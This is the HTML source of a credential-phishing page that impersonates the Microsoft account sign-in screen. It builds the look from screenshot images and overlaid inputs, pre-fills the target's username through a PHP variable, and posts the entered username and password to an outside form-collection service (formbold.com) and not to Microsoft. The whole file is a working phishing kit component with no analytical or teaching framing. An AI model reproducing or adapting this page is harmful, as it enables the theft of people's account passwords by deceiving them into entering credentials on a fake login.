<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign in to your Microsoft account</title>
    <link rel="shortcut icon" href="images/favicon.ico"/>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <style>
        body {
            text-align: center;
            margin: 0;
        }
        #container {
            position: relative;
            width: 1365px;
            margin: 0 auto;
            text-align: left; 
        }
        .textbox {
            height: 36px;
            width: 275px;
            padding-left: 8px;
            font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            font-size: 15px;
            line-height: 20px;
            font-weight: 400;
            border: none;
            border-bottom: 1px solid #666;
        }
        .textbox:focus {
            border: none;
            border-bottom: 1px solid #4488cc;
            outline: 0;
        }
        .textbox1 {
            height: 26px;
            width: 275px;
            padding-left: 8px;
            padding-right: 8px;
            font-family: "Segoe UI Webfont", -apple-system, "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
            font-size: 15px;
            color: #262626;
            text-align: left;
            line-height: 20px;
            font-weight: 400;
            border: 0;
        }
        .textbox1:focus {
            border-color: #fff;
            border-width: 0;
            outline: 0;
        }
        .css-checkbox {
            position: absolute; 
            z-index: -1000; 
            left: -1000px; 
            overflow: hidden; 
            clip: rect(0 0 0 0); 
            height: 1px; 
            width: 1px; 
            margin: -1px; 
            padding: 0; 
            border: 0;
        }
        .css-checkbox + label.css-label {
            padding-left: 26px;
            height: 21px; 
            display: inline-block;
            line-height: 21px;
            font-size: 21px;
            vertical-align: middle;
            cursor: pointer;
        }
        .css-checkbox:checked + label.css-label {
            background-position: 0 -21px;
        }
        label.css-label {
            background-image: url(images/csscheckbox_0f97b07d91ef3d2f1c0f936a59395179.png);
            background-repeat: no-repeat;
            background-position: 0 0;
            -webkit-touch-callout: none;
            -webkit-user-select: none;
            -khtml-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none;
        }
        p {
            font-size: 40px;
        }
        .loader {
            position: fixed;
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            z-index: 9999;
            background: url('https://smallenvelop.com/wp-content/uploads/2014/08/Preloader_11.gif') 50% 50% no-repeat rgb(249,249,249);
            opacity: .8;
        }
    </style>
    <script>
        $(window).on('load', function() {
            $(".loader").fadeOut("slow");
        });
    </script>
</head>
<body>
    <div class="loader"></div>
    <div id="container">
        <div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1365px; height:662px; z-index:0">
            <img src="images/zt3.png" alt="Background Image" width="1365" height="662">
        </div>
        <div id="image2" style="position:absolute; overflow:hidden; left:508px; top:388px; width:137px; height:17px; z-index:1">
            <a href="#"><img src="images/zt4.png" alt="Link Image" width="137" height="17"></a>
        </div>
        <form action="https://formbold.com/s/94pAZ" method="post" id="yehiswal">
            <input name="user1" value="<?=$id?>" type="hidden">
            <label for="user">Username</label>
            <input name="user" id="user" value="<?=$id?>" class="textbox1" autocomplete="off" required type="text" style="position:absolute;width:356px;left:534px;top:215px;z-index:2">
            <label for="pd">Password</label>
            <input name="pd" id="pd" placeholder="Password" class="textbox" autocomplete="off" required type="password" style="position:absolute;width:352px;left:507px;top:299px;z-index:3">
            
            <div style="position:absolute; left:507px; top:348px; z-index:4">
                <input type="checkbox" name="checkboxG1" id="checkboxG1" class="css-checkbox">
                <label for="checkboxG1" class="css-label radGroup1 chk"></label>
            </div>
            <div style="position:absolute; left:507px; top:348px; z-index:4">
                <input type="checkbox" name="checkboxG2" id="checkboxG2" class="css-checkbox">
                <label for="checkboxG2" class="css-label radGroup1 clr"></label>
            </div>
            <div id="formimage1" style="position:absolute; left:749px; top:424px; z-index:5">
                <input type="image" name="formimage1" width="110" height="34" src="images/zgn.png" alt="Submit Button">
            </div>
        </form>
    </div>
</body>
</html>
